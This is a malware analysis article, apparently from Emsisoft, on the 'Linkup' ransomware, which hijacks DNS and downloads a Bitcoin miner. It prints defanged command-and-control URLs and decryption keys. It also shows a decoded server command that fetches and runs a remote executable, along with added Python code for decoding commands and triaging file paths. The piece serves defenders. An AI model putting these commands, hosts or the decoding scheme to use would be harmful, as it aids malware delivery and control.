Malware Analysis: Ransomware “Linkup” Blocks DNS and Mines Bitcoins



Over the past week, the Emsisoft Malware Analysis team has been closely following a new ransomware Trojan variant that has been detected by Emsisoft Anti-Malware as Trojan-Ransom.Win32.Linkup.

“Linkup” is an interesting piece of ransomware, because unlike previous models it does not directly lock your computer or encrypt files.  Instead, Linkup blocks Internet access by modifying your DNS and can also turn your computer into a bitcoin mining robot.

Protecting Yourself from Linkup

Users running Emsisoft Anti-Malware are automatically protected from Linkup, and should block the program when it is identified as Trojan-Ransom.Win32.Linkup.  Users who have been infected by Linkup will be blocked from Internet usage and will encounter the following “website” when attempting to browse.


What is encountered is the typical ransomware form, which in this case demands personal information and a payment method to unlock Internet usage.  The form states that you will only be charged EUR 0.01, but this is unconfirmed and most likely a blatant lie.  Do not submit any personal information!  If your computer has been infected, we advise you to find another means of connecting to the Internet and contact Emsisoft Support to assist you with removal.

How Linkup Works

Once the Linkup Trojan has been executed, it copies itself into the %AppData%\Microsoft\Windows directory as svchost.exe, a fake name meant to mimic a normal Windows file that is located in %windir%\system32.  To mark its presence in the system, Linkup creates a mutex named tnd990r or tnd990s. We have also found that Linkup will actually disable selected Windows Security and Firewall services to facilitate infection.


Once established on your PC, Linkup contacts its server to provide it with data related to your machine.  It does this by sending a POST request to the following address, transmitted in an encrypted state.

What kind of data is Linkup sending its server?  When decrypted the “token” value will look like this:

uid=xxxxx&ver=3.55&dl=0&il=0&dip=j5w4FFXB&wl=ENU&wv=5.1.2600.SP3.0.256.1.2.x86&ia=1

That’s your unique user id (uid), your version of Windows (ver), and the language you’re using, in this case ENU, or United States English.  This information helps facilitate infection, as Linkup must know what type of computer it is working with if it is to function.

Linkup also gives itself a layer of redundancy, so that if one host fails it can still communicate with another Command and Control server. Decryption reveals the following Command and Control hosts:

hxxp://62.75.221.37/uplink.php?logo.jpg

hxxp://hoseen45r.com/uplink.php?logo.jpg

hxxp://onetimes21s.com/uplink.php?logo.jpg

hxxp://setpec14rs.com/uplink.php?logo.jpg

Linkup decrypts the string with the following key:

IVW-Q3Xo5sBYzDTJK6LPuSrvEkAcghH8lw0GbfFe9dn_MRpqxONZam7ij2yUC14t


Further analysis of Linkup’s body reveals another interesting string, which is actually another decryption key:

Fo6u-YTelBCv0Ac4XiRW_1GJSV2O8jP7nZkbwqLENshpHtg5Kxa3QMfzrUDy9dmI

This key translates commands from Linkup’s server so that the malware can perform them. Upon initial connection, the very first command that is sent looks like this:

nK_RglbAg_3Axlb0z0bv1Bq6NokWKiej59kcg-WcKlb0f-bvara0Kdk0a0ejr1LvFFXV

Linkup decrypts this command using its key, turning it into this:

IL 62.75.221.37
RUN hxxp://91.220.163.22/pts2.exe
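The article does not spell out the algorithm behind this key. Working back from the sample command and its published plaintext, the encoding behaves like base64 with the key as a 64-character alphabet and each 4-character group read last character first; the added example below (not Emsisoft's code and not taken from the malware) decodes a captured command on that inferred assumption and defangs the result. Function names are hypothetical.

```python
# Command key and sample command exactly as published in the analysis above.
COMMAND_KEY = "Fo6u-YTelBCv0Ac4XiRW_1GJSV2O8jP7nZkbwqLENshpHtg5Kxa3QMfzrUDy9dmI"
SAMPLE_COMMAND = ("nK_RglbAg_3Axlb0z0bv1Bq6NokWKiej59kcg-WcKlb0f-bvara0"
                  "Kdk0a0ejr1LvFFXV")

# The key is used as a lookup alphabet: character -> 6-bit value.
INDEX = {ch: i for i, ch in enumerate(COMMAND_KEY)}


def decode_command(blob: str) -> str:
    """Decode one server command (assumed scheme, inferred from the sample)."""
    if len(blob) % 4:
        raise ValueError("encoded length must be a multiple of 4")
    out = bytearray()
    for pos in range(0, len(blob), 4):
        value = 0
        # Assumption: the LAST character of each group holds the top 6 bits,
        # so the group is consumed in reverse to rebuild the 24-bit value.
        for ch in reversed(blob[pos:pos + 4]):
            if ch not in INDEX:
                raise ValueError(f"character {ch!r} is not in the key")
            value = (value << 6) | INDEX[ch]
        out += value.to_bytes(3, "big")
    # Assumption: trailing NUL bytes are padding to a multiple of 3 bytes.
    return out.rstrip(b"\x00").decode("ascii", errors="replace")


def defang(text: str) -> str:
    """Rewrite URL schemes so decoded commands are safe to paste into notes."""
    return text.replace("http://", "hxxp://").replace("https://", "hxxps://")


def parse_commands(text: str):
    """Split decoded text into (verb, argument) pairs, one per line."""
    return [tuple(line.split(" ", 1)) for line in text.splitlines() if line]


if __name__ == "__main__":
    for verb, arg in parse_commands(defang(decode_command(SAMPLE_COMMAND))):
        print(f"{verb:<4} {arg}")
```

The same scheme is untested against the first key, because the page gives no ciphertext for it.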


The first command (IL 62.75.221.37) redirects every HTTP request to the ransomware website, located at 62.75.221.37, addressed hxxp://62.75.221.37/worlds/test/index.html. At this point, Linkup will then begin to redirect your DNS so that you end up at the ransomware site whenever you browse.

To redirect every single DNS request, Linkup also makes several changes in the Windows registry, including modifying the following:

Linkup then finalizes this action by refreshing various Internet/connectivity component settings, in order to ensure the changes it made are effective immediately.  It does this by running the following commands:


This redirect is malicious enough, but what is so interesting about Linkup is that it doesn’t stop there.  Note the second line of the initial command from the server: RUN hxxp://91.220.163.22/pts2.exe.  This command instructs your computer to download and run the file pts2.exe.  What’s pts2.exe?  A downloader designed to connect your computer to a Bitcoin mining botnet!

Bitcoin Mining Botnet?

The technical processes behind “Bitcoin mining” are complex.  For a good summary, consider reading Ken Tiddel’s “Geeks Love The Bitcoin Phenomenon Like They Loved the Internet in 1995,” or Emsisoft’s Attack on Bitcoins.

In the case of Linkup, the most important thing to understand about Bitcoin mining is that if a hacker can get more computing power, he can earn more Bitcoins.  That’s why in addition to blocking Internet browsing, Linkup also attempts to connect your computer to a Bitcoin mining botnet, which can combine the computing power of multiple infected computers to earn new Bitcoins for whoever is behind the attack.

Pts2.exe is a downloader, and it’s placed in the same directory as the fake svchost.exe file we started this analysis out with.  Behind the scenes, pts2.exe is actually formatted as Update_%random%.exe.  This is a .NET based file designed to download and execute another file from hxxp://64.32.28.155/b.exe and store it in C:\Users\Public\b.exe.

Upon further analysis, our malware team identified this “other file” to be a self-extracting RAR that extracts several script files and one executable.  The SFX script executes a 64-bit PE file, named j.exe, which is jhProtominer. As the name suggests, jhProtominer is a Protoshares mining application.

This combination of ransomware and Bitcoin mining is a new and fascinating development.  At this point, however, its functionality is still quite limited as the downloaded jhProtominer only works on 64-bit operating systems.  In time, it will be interesting to see if Linkup is modified to download more flexible variants.
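The file locations named in this analysis can be turned into a quick triage check over a list of process image paths collected from a machine. This is an added example, not Emsisoft's code; the function name, the sample paths and the treatment of the random part of Update_%random%.exe as any non-empty string are assumptions of the example.

```python
import ntpath
import re


def _norm(path):
    # ntpath applies Windows rules (case-insensitive, backslashes) on any OS.
    return ntpath.normcase(ntpath.normpath(path))


def linkup_path_findings(image_paths, env):
    """Return (path, reason) pairs for paths matching the layout described above."""
    # SysWOW64 holds the legitimate 32-bit svchost.exe on 64-bit Windows.
    legit_dirs = {_norm(ntpath.join(env["windir"], d))
                  for d in ("System32", "SysWOW64")}
    drop_dir = _norm(ntpath.join(env["AppData"], "Microsoft", "Windows"))
    stage2 = _norm(r"C:\Users\Public\b.exe")
    findings = []
    for path in image_paths:
        full = _norm(path)
        folder, name = ntpath.split(full)
        if name == "svchost.exe" and folder not in legit_dirs:
            findings.append((path, "svchost.exe outside the Windows system directory"))
        elif folder == drop_dir and re.fullmatch(r"update_.+\.exe", name):
            findings.append((path, "Update_<random>.exe beside the fake svchost.exe"))
        elif full == stage2:
            findings.append((path, "downloaded b.exe in C:\\Users\\Public"))
    return findings


# Constructed sample data for illustration, not taken from a real host.
SAMPLE_ENV = {"windir": r"C:\Windows",
              "AppData": r"C:\Users\alice\AppData\Roaming"}
SAMPLE_PATHS = [
    r"C:\Windows\System32\svchost.exe",
    r"C:\Windows\SysWOW64\svchost.exe",
    r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\svchost.exe",
    r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Update_4821.exe",
    r"c:\users\public\B.EXE",
]

if __name__ == "__main__":
    for path, reason in linkup_path_findings(SAMPLE_PATHS, SAMPLE_ENV):
        print(f"{reason}: {path}")
```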

Hashes of files analyzed in this article

What do you think about Linkup?

In the coming weeks, Emsisoft’s Malware Analysis team will be keeping a close eye on Linkup, as the malware will inevitably evolve. We have provided this analysis because Linkup represents a new approach to infection, which combines two known techniques — ransomware and Bitcoin mining — to create one potent form of money making malware.

If you have any questions about Linkup, we encourage you to contact Emsisoft Support directly. There, you can share your thoughts or even your own discoveries to help Emsisoft in its mission of making the world a more malware-free place.  In the meantime, steer clear of the mines, and have a great (ransomware-free) day!


Senan Conrad
